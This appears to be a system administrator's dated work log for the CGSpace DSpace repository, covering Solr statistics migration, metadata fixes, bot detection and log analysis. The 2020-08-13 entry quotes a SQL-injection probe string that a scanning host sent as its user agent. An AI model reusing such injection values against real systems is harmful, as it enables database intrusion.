  • Export some of the CGSpace Solr stats minus the Atmire CUA schema additions for Salem to play with:
+
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics-2019 -a export -o /tmp/statistics-2019-1.json -f 'time:[2019-01-01T00\:00\:00Z TO 2019-06-30T23\:59\:59Z]' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
+
  • Run system updates on DSpace Test (linode26) and reboot it
  • I looked into the unmigrated Solr records more and they are overwhelmingly type: 5 (which means “Site” according to the DSpace constants):
      • statistics
          • id: -1-unmigrated
              • type 5: 167316
          • id: 0-unmigrated
              • type 5: 32581
          • id: -1
              • type 5: 10198
      • statistics-2019
          • id: -1
              • type 5: 2690500
          • id: -1-unmigrated
              • type 5: 1348202
          • id: 0-unmigrated
              • type 5: 141576
      • statistics-2018
          • id: -1
              • type 5: 365466
          • id: -1-unmigrated
              • type 5: 254680
          • id: 0-unmigrated
              • type 5: 204854
          • 145870-unmigrated
              • type 0: 83235
      • statistics-2017
          • id: -1
              • type 5: 808346
          • id: -1-unmigrated
              • type 5: 598022
          • id: 0-unmigrated
              • type 5: 254014
          • 145870-unmigrated
              • type 0: 28168
              • bundleName THUMBNAIL: 28168
  • There is another one that appears in 2018 and 2017, at least, of type 0, which would be a download
      • In that case the id is that of a bitstream that no longer exists…?
  • I started processing Solr stats with the Atmire tool now:
+
$ dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -c statistics -f -t 12
+
    +
  • This one failed after a few hours:
  • +
+
Record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b couldn't be processed
+com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: c4b5974a-025d-4adc-b6c3-c8846048b62b, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:161)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: java.lang.NullPointerException
+
+Run 2 — 100% — 2,237,670/2,239,523 docs — 12s — 2h 25m 41s
+Run 2 took 2h 25m 41s
+179,310 docs failed to process
+If run the update again with the resume option (-r) they will be reattempted
+
    +
  • I started the same script for the statistics-2019 core (12 million records…)
  • +
  • Update an ILRI author’s name on CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2020-07-27-fix-ILRI-author.csv -db dspace -u cgspace -p 'fuuu' -f dc.contributor.author -t 'correct' -m 3
+Fixed 13 occurences of: Muloi, D.
+Fixed 4 occurences of: Muloi, D.M.
+

2020-07-28

  • I started analyzing the situation with the cases I’ve seen where a Solr record fails to be migrated (a facet-query sketch for checking this breakdown per core is below, after this list):
      • id: 0-unmigrated are mostly (all?) type: 5, aka site view
      • id: -1-unmigrated are mostly (all?) type: 5, aka site view
      • id: -1 are mostly (all?) type: 5, aka site view
      • id: 59184-unmigrated, where “59184” is the id of an item or bitstream that no longer exists
  • Why doesn’t Atmire’s code ignore any id with “-unmigrated”?
  • I sent feedback to Atmire since they had responded to my previous question yesterday
      • They said that the DSpace 6 version of CUA does not work with Tomcat 8.5…
  • I spent a few hours trying to write a Jython-based curation task to update ISO 3166-1 Alpha2 country codes based on each item’s ISO 3166-1 country
      • Peter doesn’t want to use the ISO 3166-1 list because he objects to a few names, so I thought we might be able to use country codes or numeric codes and update the names with a curation task
      • The work is very rough but kinda works: mytask.py
      • What is nice is that the dso.update() method updates the data the “DSpace way” so we don’t need to re-index Solr
      • I had a clever idea to “vendor” the pycountry code using pip install pycountry -t, but pycountry dropped support for Python 2 in 2019 so we can only use an outdated version
      • In the end it’s really limiting to do this particular task in Jython because we are stuck with Python 2, we can’t use virtual environments, and there is a lot of code we’d need to write to be able to handle the ISO 3166 country lists
      • Python 2 is no longer supported by the Python community anyway so it’s probably better to figure out how to do this in Java
+
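
A sketch of the facet query mentioned above, for checking the breakdown of unmigrated records by type in a given core (assuming the same local Solr instance used elsewhere in these notes):

$ curl -s 'http://localhost:8081/solr/statistics-2018/select?q=id:/.*unmigrated.*/&rows=0&facet=true&facet.field=type&wt=json&indent=true'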

2020-07-29

  • The Atmire stats tool (com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI) created 150GB of log files due to errors and the disk got full on DSpace Test (linode26)
      • This morning I had noticed that the run I started last night said that 54,000,000 (54 million!) records failed to process, but the core only had 6 million or so documents to process…!
      • I removed the large log files and optimized the Solr core
+

2020-07-30

  • Looking into ISO 3166-1 from the iso-codes package
      • I see that all current 249 countries have names, 173 have official names, and 6 have common names:
+
# grep -c numeric /usr/share/iso-codes/json/iso_3166-1.json
+249
+# grep -c -E '"name":' /usr/share/iso-codes/json/iso_3166-1.json
+249
+# grep -c -E '"official_name":' /usr/share/iso-codes/json/iso_3166-1.json
+173
+# grep -c -E '"common_name":' /usr/share/iso-codes/json/iso_3166-1.json
+6
+
    +
  • Wow, the CC-BY-NC-ND-3.0-IGO license that I had requested in 2019-02 was finally merged into SPDX…
  • +

August, 2020


2020-08-02

  • I spent a few days working on a Java-based curation task to tag items with ISO 3166-1 Alpha2 country codes based on their cg.coverage.country text values
      • It looks up the names in ISO 3166-1 first, and then in our CGSpace countries mapping (which has five or so of Peter’s preferred “display” country names)
      • It implements a “force” mode too that will clear existing country codes and re-tag everything
      • It is class based so I can easily add support for other vocabularies, and the technique could even be used for organizations with mappings to ROR and CLARISA…

2020-08-03

  • Atmire responded to the ticket about the ongoing upgrade issues
      • They pushed an RC2 version of the CUA module that fixes the FontAwesome issue so that they now use classes instead of Unicode hex characters, so our JS + SVG works!
      • They also said they have never experienced the type: 5 site statistics issue, so I need to try to purge those and continue with the stats processing
  • I purged all unmigrated stats in a few cores and then restarted processing:
+
$ curl -s "http://localhost:8081/solr/statistics/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
+$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
+$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics
+
  • Andrea from Macaroni Bros emailed me a few days ago to say he’s having issues with the CGSpace REST API
+

2020-08-04

  • Looking into the REST API issue Andrea reported: on CGSpace a collection reports more items than the REST API actually returns:

$ http 'http://localhost:8080/rest/collections/1445' | json_pp | grep numberItems
+   "numberItems" : 63,
+$ http 'http://localhost:8080/rest/collections/1445/items' | jq '. | length'
+61
+
    +
  • Also on DSpace Test (which is running DSpace 6!), though the issue is slightly different there:
  • +
+
$ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708' | json_pp | grep numberItems
+   "numberItems" : 61,
+$ http 'https://dspacetest.cgiar.org/rest/collections/5471c3aa-202e-42f0-96c2-497a18e3b708/items' | jq '. | length'
+59
+
  • Ah! I exported that collection’s metadata and checked it in OpenRefine, where I noticed that two items are mapped twice
      • I dealt with this problem in 2017-01 and the solution is to check the collection2item table:
+
dspace=# SELECT * FROM collection2item WHERE item_id = '107687';
+   id   | collection_id | item_id
+--------+---------------+---------
+ 133698 |           966 |  107687
+ 134685 |          1445 |  107687
+ 134686 |          1445 |  107687
+(3 rows)
+
    +
  • So for each id you can delete one duplicate mapping:
  • +
+
dspace=# DELETE FROM collection2item WHERE id='134686';
+dspace=# DELETE FROM collection2item WHERE id='128819';
+
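
All such duplicate mappings could also be found in one query — a sketch, assuming the same dspace database and credentials used above:

$ psql -d dspace -U dspace -c 'SELECT item_id, collection_id, COUNT(*) FROM collection2item GROUP BY item_id, collection_id HAVING COUNT(*) > 1;'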
    +
  • Update countries on CGSpace to be closer to ISO 3166-1 with some minor differences based on Peter’s preferred display names
  • +
+
$ cat 2020-08-04-PB-new-countries.csv
+cg.coverage.country,correct
+CAPE VERDE,CABO VERDE
+COCOS ISLANDS,COCOS (KEELING) ISLANDS
+"CONGO, DR","CONGO, DEMOCRATIC REPUBLIC OF"
+COTE D'IVOIRE,CÔTE D'IVOIRE
+"KOREA, REPUBLIC","KOREA, REPUBLIC OF"
+PALESTINE,"PALESTINE, STATE OF"
+$ ./fix-metadata-values.py -i 2020-08-04-PB-new-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228
+
  • I had to restart Tomcat 7 three times before all the Solr statistics cores came up properly
      • I started a full Discovery re-indexing
+

2020-08-05

  • Port my dspace-curation-tasks to DSpace 6 and tag version 6.0-SNAPSHOT
  • I downloaded the UN M.49 CSV file to start working on updating the CGSpace regions
      • The first issue is that they don’t version the file, so you have no idea when it was released
      • The second issue is that three rows have errors due to not using quotes around “China, Macao Special Administrative Region”
  • Bizu said she was having problems approving tasks on CGSpace
      • I looked at the PostgreSQL locks and they have skyrocketed since yesterday:

Munin graphs: PostgreSQL locks (day), PostgreSQL query length (day)

  • It seems that something happened yesterday afternoon at around 5PM…
      • For now I will just run all updates on the server and reboot it, as I have no idea what causes this issue
      • I had to restart Tomcat 7 three times after the server came back up before all Solr statistics cores came up properly
  • I checked the nginx logs around 5PM yesterday to see who was accessing the server:
+
# cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '04/Aug/2020:(17|18)' | goaccess --log-format=COMBINED -
+
    +
  • I see the Macaroni Bros are using their new user agent for harvesting: RTB website BOT +
      +
    • But that pattern doesn’t match in the nginx bot list or Tomcat’s crawler session manager valve because we’re only checking for [Bb]ot!
    • +
    • So they have created thousands of Tomcat sessions:
    • +
    +
  • +
+
$ cat dspace.log.2020-08-04 | grep -E "(63.32.242.35|64.62.202.71)" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+5693
+
    +
  • DSpace itself uses a case-sensitive regex for user agents so there are no hits from those IPs in Solr, but I need to tweak the other regexes so they don’t misuse the resources +
      +
    • Perhaps [Bb][Oo][Tt]
    • +
    +
  • +
  • I see another IP 104.198.96.245, which is also using the “RTB website BOT” but there are 70,000 hits in Solr from earlier this year before they started using the user agent +
      +
    • I purged all the hits from Solr, including a few thousand from 64.62.202.71
    • +
    +
  • +
  • A few more IPs causing lots of Tomcat sessions yesterday:
  • +
+
$ cat dspace.log.2020-08-04 | grep "38.128.66.10" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+1585
+$ cat dspace.log.2020-08-04 | grep "64.62.202.71" | grep -E 'session_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+5691
+
    +
  • 38.128.66.10 isn’t creating any Solr statistics due to our DSpace agents pattern, but they are creating lots of sessions so perhaps I need to force them to use one session in Tomcat:
  • +
+
Mozilla/5.0 (Windows NT 5.1) brokenlinkcheck.com/1.2
+
    +
  • 64.62.202.71 is using a user agent I’ve never seen before:
  • +
+
Mozilla/5.0 (compatible; +centuryb.o.t9[at]gmail.com)
+
  • So now our “bot” regex can’t even match that…
      • Unless we change it to [Bb]\.?[Oo]\.?[Tt]\.?… which seems to match all the variations of “bot” I can think of right now, according to regexr.com (a quick grep check against the agents below is sketched after the list):
+
RTB website BOT
+Altmetribot
+Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
+Mozilla/5.0 (compatible; +centuryb.o.t9[at]gmail.com)
+Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)
+
    +
  • And another IP belonging to Turnitin (the alternate user agent of Turnitinbot):
  • +
+
$ cat dspace.log.2020-08-04 | grep "199.47.87.145" | grep -E 'sessi
+on_id=[A-Z0-9]{32}' | sort | uniq | wc -l
+2777
+
    +
  • I will add Turnitin to the Tomcat Crawler Session Manager Valve regex as well…
  • +
+

2020-08-06

  • I have been working on processing the Solr statistics with the Atmire tool on DSpace Test the last few days:
      • statistics:
          • 2,040,385 docs: 2h 28m 49s
      • statistics-2019:
          • 8,960,000 docs: 12h 7s
          • 1,780,575 docs: 2h 7m 29s
      • statistics-2018:
          • 1,970,000 docs: 12h 1m 28s
          • 360,000 docs: 2h 54m 56s (Linode rebooted)
          • 1,110,000 docs: 7h 1m 44s (Restarted Tomcat, oops)
  • I decided to start the 2018 core over again, so I re-synced it from CGSpace and started again from the solr-upgrade-statistics-6x tool, and now I’m having the same issues with Java heap space that I had last month
      • The process kept crashing due to memory, so I increased the memory to 3072m and finally 4096m…
      • Also, I decided to try to purge all the -unmigrated docs that it had found so far to see if that helps…
      • There were about 466,000 unmigrated records so far, most of which were type: 5 (SITE statistics)
      • Now it is processing again…
  • I developed a small Java class called FixJpgJpgThumbnails to remove “.jpg.jpg” thumbnails from the THUMBNAIL bundle and replace them with their originals from the ORIGINAL bundle
+

2020-08-07

+
    +
  • I improved the RemovePNGThumbnailsForPDFs.java a bit more to exclude infographics and original bitstreams larger than 100KiB +
      +
    • I ran it on CGSpace and it cleaned up 3,769 thumbnails!
    • +
    • Afterwards I ran dspace cleanup -v to remove the deleted thumbnails
    • +
    +
  • +
+

2020-08-08

+
    +
  • The Atmire stats processing for the statistics-2018 Solr core keeps stopping with this error:
  • +
+
Exception: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
+java.lang.RuntimeException: 50 consecutive records couldn't be saved. There's most likely an issue with the connection to the solr server. Shutting down.
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.storeOnServer(SourceFile:317)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:177)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:161)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • It lists a few of the records that it is having issues with and they all have integer IDs +
      +
    • When I checked Solr I see 8,000 of them, some of which have type 0 and some with no type…
    • +
    • I purged them and then the process continues:
    • +
    +
  • +
+
$ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/[0-9]+/</query></delete>'
+

2020-08-09

+
    +
  • The Atmire script did something to the server and created 132GB of log files so the root partition ran out of space…
  • +
  • I removed the log file and tried to re-run the process but it seems to be looping over 11,000 records and failing, creating millions of lines in the logs again:
  • +
+
# grep -oE "Record uid: ([a-f0-9\\-]*){1} couldn't be processed" /home/dspacetest.cgiar.org/log/dspace.log.2020-08-09 > /tmp/not-processed-errors.txt
+# wc -l /tmp/not-processed-errors.txt
+2202973 /tmp/not-processed-errors.txt
+# sort /tmp/not-processed-errors.txt | uniq -c | tail -n 10
+    220 Record uid: ffe52878-ba23-44fb-8df7-a261bb358abc couldn't be processed
+    220 Record uid: ffecb2b0-944d-4629-afdf-5ad995facaf9 couldn't be processed
+    220 Record uid: ffedde6b-0782-4d9f-93ff-d1ba1a737585 couldn't be processed
+    220 Record uid: ffedfb13-e929-4909-b600-a18295520a97 couldn't be processed
+    220 Record uid: fff116fb-a1a0-40d0-b0fb-b71e9bb898e5 couldn't be processed
+    221 Record uid: fff1349d-79d5-4ceb-89a1-ce78107d982d couldn't be processed
+    220 Record uid: fff13ddb-b2a2-410a-9baa-97e333118c74 couldn't be processed
+    220 Record uid: fff232a6-a008-47d0-ad83-6e209bb6cdf9 couldn't be processed
+    221 Record uid: fff75243-c3be-48a0-98f8-a656f925cb68 couldn't be processed
+    221 Record uid: fff88af8-88d4-4f79-ba1a-79853973c872 couldn't be processed
+
    +
  • I looked at some of those records and saw strange objects in their containerCommunity, containerCollection, etc…
  • +
+
{
+  "responseHeader": {
+    "status": 0,
+    "QTime": 0,
+    "params": {
+      "q": "uid:fff1349d-79d5-4ceb-89a1-ce78107d982d",
+      "indent": "true",
+      "wt": "json",
+      "_": "1596957629970"
+    }
+  },
+  "response": {
+    "numFound": 1,
+    "start": 0,
+    "docs": [
+      {
+        "containerCommunity": [
+          "155",
+          "155",
+          "{set=null}"
+        ],
+        "uid": "fff1349d-79d5-4ceb-89a1-ce78107d982d",
+        "containerCollection": [
+          "1099",
+          "830",
+          "{set=830}"
+        ],
+        "owningComm": [
+          "155",
+          "155",
+          "{set=null}"
+        ],
+        "isInternal": false,
+        "isBot": false,
+        "statistics_type": "view",
+        "time": "2018-05-08T23:17:00.157Z",
+        "owningColl": [
+          "1099",
+          "830",
+          "{set=830}"
+        ],
+        "_version_": 1621500445042147300
+      }
+    ]
+  }
+}
+
    +
  • I deleted those 11,724 records with the strange “set” object in the collections and communities, as well as 360,000 records with id: -1
  • +
+
$ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
+$ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:\-1</query></delete>'
+
  • I was going to compare the CUA stats for 2018 and 2019 on CGSpace and DSpace Test, but after Linode rebooted CGSpace (linode18) for maintenance yesterday the Solr cores didn’t all come back up OK
      • I had to restart Tomcat five times before they all came up!
      • After that I generated a report for 2018 and 2019 on each server and found that the difference is about 10,000–20,000 per month, which is much less than I was expecting
  • I noticed some authors that should have ORCID identifiers but didn’t (perhaps older items from before we were tagging ORCID metadata)
      • With the simple list below I added 1,341 identifiers!
+
$ cat 2020-08-09-add-ILRI-orcids.csv
+dc.contributor.author,cg.creator.id
+"Grace, Delia","Delia Grace: 0000-0002-0195-9489"
+"Delia Grace","Delia Grace: 0000-0002-0195-9489"
+"Baker, Derek","Derek Baker: 0000-0001-6020-6973"
+"Ngan Tran Thi","Tran Thi Ngan: 0000-0002-7184-3086"
+"Dang Xuan Sinh","Sinh Dang-Xuan: 0000-0002-0522-7808"
+"Hung Nguyen-Viet","Hung Nguyen-Viet: 0000-0001-9877-0596"
+"Pham Van Hung","Pham Anh Hung: 0000-0001-9366-0259"
+"Lindahl, Johanna F.","Johanna Lindahl: 0000-0002-1175-0398"
+"Teufel, Nils","Nils Teufel: 0000-0001-5305-6620"
+"Duncan, Alan J.",Alan Duncan: 0000-0002-3954-3067"
+"Moodley, Arshnee","Arshnee Moodley: 0000-0002-6469-3948"
+
    +
  • That got me curious, so I generated a list of all the unique ORCID identifiers we have in the database:
  • +
+
dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=240) TO /tmp/2020-08-09-orcid-identifiers.csv;
+COPY 2095
+dspace=# \q
+$ grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' /tmp/2020-08-09-orcid-identifiers.csv | sort | uniq > /tmp/2020-08-09-orcid-identifiers-uniq.csv
+$ wc -l /tmp/2020-08-09-orcid-identifiers-uniq.csv
+1949 /tmp/2020-08-09-orcid-identifiers-uniq.csv
+
  • I looked into the strange Solr record above that had “{set=830}” in the communities and collections
      • There are exactly 11724 records like this in the current CGSpace (DSpace 5.8) statistics-2018 Solr core
      • None of them have an id or type field!
      • I see 242,000 of them in the statistics-2017 core, 185,063 in the statistics-2016 core… all the way back to 2010, but not in 2019 or the current statistics core
      • I decided to purge all of these records from CGSpace right now so they don’t even have a chance at being an issue on the real migration:
+
$ curl -s "http://localhost:8081/solr/statistics-2018/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
+...
+$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'
+
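
The same delete could be looped over all the yearly cores instead of being run by hand for each one — a sketch, assuming cores named statistics-2010 through statistics-2018:

$ for year in $(seq 2010 2018); do curl -s "http://localhost:8081/solr/statistics-$year/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>owningColl:/.*set.*/</query></delete>'; done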
    +
  • I added Googlebot and Twitterbot to the list of explicitly allowed bots +
      +
    • In Google’s case, they were getting lumped in with all the other bad bots and then important links like the sitemaps were returning HTTP 503, but they generally respect robots.txt so we should just allow them (perhaps we can control the crawl rate in the webmaster console)
    • +
    • In Twitter’s case they were also getting lumped in with the bad bots too, but really they only make ~50 or so requests a day when someone posts a CGSpace link on Twitter
    • +
    +
  • +
  • I tagged the ISO 3166-1 Alpha2 country codes on all items on CGSpace using my CountryCodeTagger curation task +
      +
    • I still need to set up a cron job for it…
    • +
    • This tagged 50,000 countries!
    • +
    +
  • +
+
dspace=# SELECT count(text_value) FROM metadatavalue WHERE metadata_field_id = 243 AND resource_type_id = 2;
+ count
+-------
+ 50812
+(1 row)
+

2020-08-11

  • I noticed some more hits from Macaroni’s WordPress harvester that I hadn’t caught last week
      • 104.198.13.34 made many requests without a user agent, with a “WordPress” user agent, and with their new “RTB website BOT” user agent, about 100,000 in total in 2020, and maybe another 70,000 in the other years
      • I will purge them and add them to the Tomcat Crawler Session Manager and the DSpace bots list so they don’t get logged in Solr
  • I noticed a bunch of user agents with “Crawl” in the Solr stats, which is strange because the DSpace spider agents file has had “crawl” for a long time (and it is case insensitive)
      • In any case I will purge them and add them to the Tomcat Crawler Session Manager Valve so that at least their sessions get re-used
+

2020-08-13

  • Linode keeps sending mails that the load and outgoing bandwidth are above the threshold
      • I took a look briefly and found two IPs with the “Delphi 2009” user agent
      • Then there is 88.99.115.53, which made 82,000 requests in 2020 so far with no user agent
      • 64.62.202.73 has made 7,000 requests with this user agent: Mozilla/5.0 (compatible; +centuryb.o.t9[at]gmail.com)
      • I had added it to the Tomcat Crawler Session Manager Valve last week but never purged the hits from Solr
      • 195.54.160.163 is making thousands of requests with user agents like this:
+

(CASE WHEN 2850=9474 THEN 2850 ELSE NULL END)

+
  • I purged 150,000 hits from 2019 and 2020 from these user agents and hosts
+

2020-08-14

+
    +
  • Last night I started the processing of the statistics-2016 core with the Atmire stats util and I see some errors like this:
  • +
+
Record uid: f6b288d7-d60d-4df9-b311-1696b88552a0 couldn't be processed
+com.atmire.statistics.util.update.atomic.ProcessingException: something went wrong while processing record uid: f6b288d7-d60d-4df9-b311-1696b88552a0, an error occured in the com.atmire.statistics.util.update.atomic.processor.ContainerOwnerDBProcessor
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.applyProcessors(SourceFile:304)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.processRecords(SourceFile:176)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.performRun(SourceFile:161)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdater.update(SourceFile:128)
+        at com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI.main(SourceFile:78)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+Caused by: java.lang.NullPointerException
+
    +
  • I see it has id: 980-unmigrated and type: 0
  • +
  • The 2016 core has 629,983 unmigrated docs, mostly: +
      +
    • type: 5: 620311
    • +
    • type: 0: 7255
    • +
    • type: 3: 1333
    • +
    +
  • +
  • I purged the unmigrated docs and continued processing:
  • +
+
$ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
+$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
+$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -t 12 -c statistics-2016
+
    +
  • Altmetric asked for a dump of CGSpace’s OAI “sets” so they can update their affiliation mappings +
      +
    • I did it in a kinda ghetto way:
    • +
    +
  • +
+
$ http 'https://cgspace.cgiar.org/oai/request?verb=ListSets' > /tmp/0.xml
+$ for num in {100..1300..100}; do http "https://cgspace.cgiar.org/oai/request?verb=ListSets&resumptionToken=////$num" > /tmp/$num.xml; sleep 2; done
+$ for num in {0..1300..100}; do cat /tmp/$num.xml >> /tmp/cgspace-oai-sets.xml; done
+
  • This produces one file that has all the sets, albeit with 14 pages of responses concatenated into one document, but that’s how theirs was in the first place… (a sketch for pulling out just the setSpec values is below)
  • Help Bizu with a restricted item for CIAT
+
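
Since the concatenated file is not a single well-formed XML document, a plain grep is an easy way to pull out just the setSpec values if a flat list is ever needed — a sketch:

$ grep -oE '<setSpec>[^<]*</setSpec>' /tmp/cgspace-oai-sets.xml | sed -e 's/<[^>]*>//g' | sort -u > /tmp/cgspace-oai-setspecs.txt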

2020-08-16

+
    +
  • The com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI script that was processing 2015 records last night started spitting shit tons of errors and created 120GB of logs…
  • +
  • I looked at a few of the UIDs that it was having problems with and they were unmigrated ones… so I purged them in 2015 and all the rest of the statistics cores
  • +
+
$ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
+...
+$ curl -s "http://localhost:8081/solr/statistics-2010/update?softCommit=true" -H "Content-Type: text/xml" --data-binary '<delete><query>id:/.*unmigrated.*/</query></delete>'
+

2020-08-19

  • I tested the DSpace 5 and DSpace 6 versions of the country code tagger curation task and noticed a few things
      • The DSpace 5.8 version finishes in 2 hours and 1 minute
      • The DSpace 6.3 version ran for over 12 hours and didn’t even finish (I killed it)
      • Furthermore, it seems that each item is curated once for each collection it appears in, causing about 115,000 items to be processed, even though we only have about 87,000
  • I had been running the tasks on the entire repository with -i 10568/0, but I think I might need to try again with the special all option before writing to the dspace-tech mailing list for help
      • Actually I just tested the all option on DSpace 5.8 and it still does many of the items multiple times, once for each of their mappings
      • I sent a message to the dspace-tech mailing list
  • I finished the Atmire stats processing on all cores on DSpace Test:
      • statistics:
          • 2,040,385 docs: 2h 28m 49s
      • statistics-2019:
          • 8,960,000 docs: 12h 7s
          • 1,780,575 docs: 2h 7m 29s
      • statistics-2018:
          • 2,200,000 docs: 12h 1m 11s
          • 2,100,000 docs: 12h 4m 19s
          • ?
      • statistics-2017:
          • 1,970,000 docs: 12h 5m 45s
          • 2,000,000 docs: 12h 5m 38s
          • 1,312,674 docs: 4h 14m 23s
      • statistics-2016:
          • 1,669,020 docs: 12h 4m 3s
          • 1,650,000 docs: 12h 7m 40s
          • 850,611 docs: 44m 52s
      • statistics-2014:
          • 4,832,334 docs: 3h 53m 41s
      • statistics-2013:
          • 4,509,891 docs: 3h 18m 44s
      • statistics-2012:
          • 3,716,857 docs: 2h 36m 21s
      • statistics-2011:
          • 1,645,426 docs: 1h 11m 41s
  • As far as I can tell, the processing became much faster once I purged all the unmigrated records
      • It took about six days for the processing according to the times above, though 2015 is missing… hmm
  • Now I am testing the Atmire Listings and Reports
      • On both my local test and DSpace Test I get no results when searching for “Orth, A.” and “Orth, Alan” or even Delia Grace, but the Discovery index is up to date and I have eighteen items…
      • I sent a message to Atmire…
+

2020-08-20

+
    +
  • Natalia from CIAT was asking how she can download all the PDFs for the items in a search result +
      +
    • The search result is for the keyword “trade off” in the WLE community
    • +
    • I converted the Discovery search to an open-search query to extract the XML, but we can’t get all the results on one page so I had to change the rpp to 100 and request a few times to get them all:
    • +
    +
  • +
+
$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=0' User-Agent:'curl' > /tmp/wle-trade-off-page1.xml
+$ http 'https://cgspace.cgiar.org/open-search/discover?scope=10568%2F34494&query=trade+off&rpp=100&start=100' User-Agent:'curl' > /tmp/wle-trade-off-page2.xml
